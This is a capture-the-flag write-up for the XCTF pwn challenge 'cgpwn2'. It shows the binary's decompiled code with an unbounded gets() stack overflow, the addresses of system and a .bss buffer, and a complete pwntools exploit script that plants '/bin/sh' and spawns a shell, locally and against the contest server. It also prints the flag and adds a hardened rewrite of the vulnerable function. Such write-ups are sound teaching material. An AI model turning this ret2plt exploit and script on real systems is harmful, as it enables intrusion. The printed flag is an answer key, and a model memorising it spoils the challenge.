
cgpwn2 [XCTF-PWN] CTF writeup series 10

程序员文章站 2022-05-15 22:40:02

Challenge link: cgpwn2

First, take a look at the challenge description:

[Figure: screenshot of the cgpwn2 challenge description]

As usual, check the binary's protections first:

aaa@qq.com:/ctf/work/python# checksec 330890cb0975439295262dd46dac13b9 
[*] '/ctf/work/python/330890cb0975439295262dd46dac13b9'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Only NX is enabled, so a stack overflow should be feasible. Open the binary in IDA:

[Figure: IDA function list showing main, hello and pwn]

We can see three important functions: main, hello and pwn. Decompiled to C they look like this:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  hello();
  puts("thank you");
  return 0;
}

char *hello()
{
  char *v0; // eax
  signed int v1; // ebx
  unsigned int v2; // ecx
  char *v3; // eax
  char s; // [esp+12h] [ebp-26h]: the stack buffer gets() writes into, 0x26 bytes below the saved ebp
  int v6; // [esp+14h] [ebp-24h]

  // Everything from here down to the first puts() is the compiler's inlined memset(&s, 0, 30).
  v0 = &s;
  v1 = 30;
  if ( (unsigned int)&s & 2 )
  {
    *(_WORD *)&s = 0;
    v0 = (char *)&v6;
    v1 = 28;
  }
  v2 = 0;
  do
  {
    *(_DWORD *)&v0[v2] = 0;
    v2 += 4;
  }
  while ( v2 < (v1 & 0xFFFFFFFC) );
  v3 = &v0[v2];
  if ( v1 & 2 )
  {
    *(_WORD *)v3 = 0;
    v3 += 2;
  }
  if ( v1 & 1 )
    *v3 = 0;
  puts("please tell me your name");
  fgets(name, 50, stdin);                   // bounded: at most 49 bytes into the 52-byte global name[]
  puts("hello,you can leave some message here:");
  return gets(&s);                          // unbounded read into s: this is the stack overflow
}

int pwn()
{
  return system("echo hehehe");
}

Notice that hello contains a pile of messy-looking code that does nothing useful (it is just the compiler's inlined zeroing of the local buffer). Only the last four lines matter:

  puts("please tell me your name");
  fgets(name, 50, stdin);
  puts("hello,you can leave some message here:");
  return gets(&s);

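For contrast, here is a hardened version of hello() in which both reads are bounded by their destination sizes and any leftover of an over-long line is discarded instead of spilling into the next read. This is an added example, not code from the challenge binary; the sizes 52 and 0x26 are taken from the decompilation and the payload offset, and read_line_bounded, hello_fixed and demo_overlong_input are hypothetical names.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Assumed sizes, taken from the decompilation and the payload offset:
 * name[52] in .bss, and 0x26 bytes between s and the saved ebp. */
#define NAME_LEN 52
#define MSG_LEN  0x26
static char name[NAME_LEN];

/* Read one line into buf (at most cap-1 bytes) and strip the newline. If the
 * line did not fit, drop its remainder so the next read cannot pick it up
 * (that leftover is what crashed the original after the first prompt).
 * Returns the number of bytes stored, or -1 at EOF. */
static int read_line_bounded(char *buf, size_t cap, FILE *in)
{
    if (fgets(buf, (int)cap, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
    } else {
        int c;                                  /* line was truncated: */
        while ((c = fgetc(in)) != EOF && c != '\n') { }   /* flush the rest */
    }
    return (int)len;
}

/* Hardened hello(): gets() is gone, both reads are bounded by their destination. */
int hello_fixed(FILE *in, char *msg, size_t msg_cap)
{
    if (read_line_bounded(name, sizeof name, in) < 0)
        return -1;
    return read_line_bounded(msg, msg_cap, in);
}

/* Demo on constructed input: a 300-byte name line, then the message "hi".
 * Returns 0 when name was truncated to 51 bytes and msg still reads "hi". */
int demo_overlong_input(void)
{
    char input[400];
    memset(input, 'A', 300);
    memcpy(input + 300, "\nhi\n", 5);
    FILE *in = fmemopen(input, strlen(input), "r");
    if (in == NULL) return -1;
    char msg[MSG_LEN];
    int n = hello_fixed(in, msg, sizeof msg);
    fclose(in);
    return (n == 2 && strcmp(msg, "hi") == 0 && strlen(name) == NAME_LEN - 1) ? 0 : 1;
}
```
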
A quick test shows that a long input at either prompt crashes the program, though we shouldn't need two overflow points. (fgets caps name at 50 bytes; the crash after the first prompt comes from the rest of the over-long line still sitting in stdin when gets reads it.)

aaa@qq.com:/ctf/work/python# ./330890cb0975439295262dd46dac13b9 
please tell me your name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
hello,you can leave some message here:
Segmentation fault
aaa@qq.com:/ctf/work/python# ./330890cb0975439295262dd46dac13b9 
please tell me your name
aa
hello,you can leave some message here:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault

Check the three ingredients of a stack-overflow exploit: the overflow point is there, and system is found in the pwn function, but /bin/sh is still missing. A global search turns up no /bin/sh string; however, the variable name lives in the .bss section as a global, so we can simply feed /bin/sh in through name. The addresses of system and name are as follows:

.plt:08048420 ; int system(const char *command)
.plt:08048420 _system         proc near               ; CODE XREF: pwn+D↓p
.plt:08048420
.plt:08048420 command         = dword ptr  4
.plt:08048420
.plt:08048420                 jmp     ds:off_804A01C
.plt:08048420 _system         endp


.bss:0804A080                 public name
.bss:0804A080 ; char name[52]
.bss:0804A080 name            db 34h dup(?)           ; DATA XREF: hello+77↑o
.bss:0804A080 _bss            ends

Good, all three ingredients are in place; now construct the payload:

system_addr = 0x08048420
binsh_addr = 0x0804A080
payload = 'A'*0x26 + 'A'*4 + p32(system_addr) + 'A'*4 + p32(binsh_addr)

Stack overflows have been explained many times in this series, so I won't go over them again. The Python script built around this payload is:

#!/usr/bin/env python
# coding=utf-8

from pwn import *
# context.log_level = 'debug'
p = process('./330890cb0975439295262dd46dac13b9')
# p = remote("111.198.29.45", 57351)

system_addr = 0x08048420   # system@plt
binsh_addr = 0x0804A080    # name[] in .bss, which the first input fills with "/bin/sh"
# 0x26 bytes to reach the saved ebp, 4 bytes of saved ebp, then the return
# address (system), a fake return address for system, and system's argument.
# Byte literals keep the script working on both Python 2 and Python 3.
payload = b'A'*0x26 + b'A'*4 + p32(system_addr) + b'A'*4 + p32(binsh_addr)

p.sendlineafter(b'please tell me your name', b'/bin/sh')
p.sendlineafter(b'you can leave some message here:', payload)
p.interactive()

The result of running it:

aaa@qq.com:/ctf/work/python# python cgpwn2.py
[+] Starting local process './330890cb0975439295262dd46dac13b9': pid 197
[*] Switching to interactive mode

$ id
uid=0(root) gid=0(root) groups=0(root)
$  

It worked. Now change the script to connect to the server:

aaa@qq.com:/ctf/work/python# python cgpwn2.py
[+] Opening connection to 111.198.29.45 on port 57351: Done
[*] Switching to interactive mode

$ cat flag
cyberpeace{8a707891cac7e8c2b05dd9ea2d76df86}
$  

Success. The point this challenge tests is how to construct /bin/sh using a variable in the .bss section.

Tags: CTF, XCTF-PWN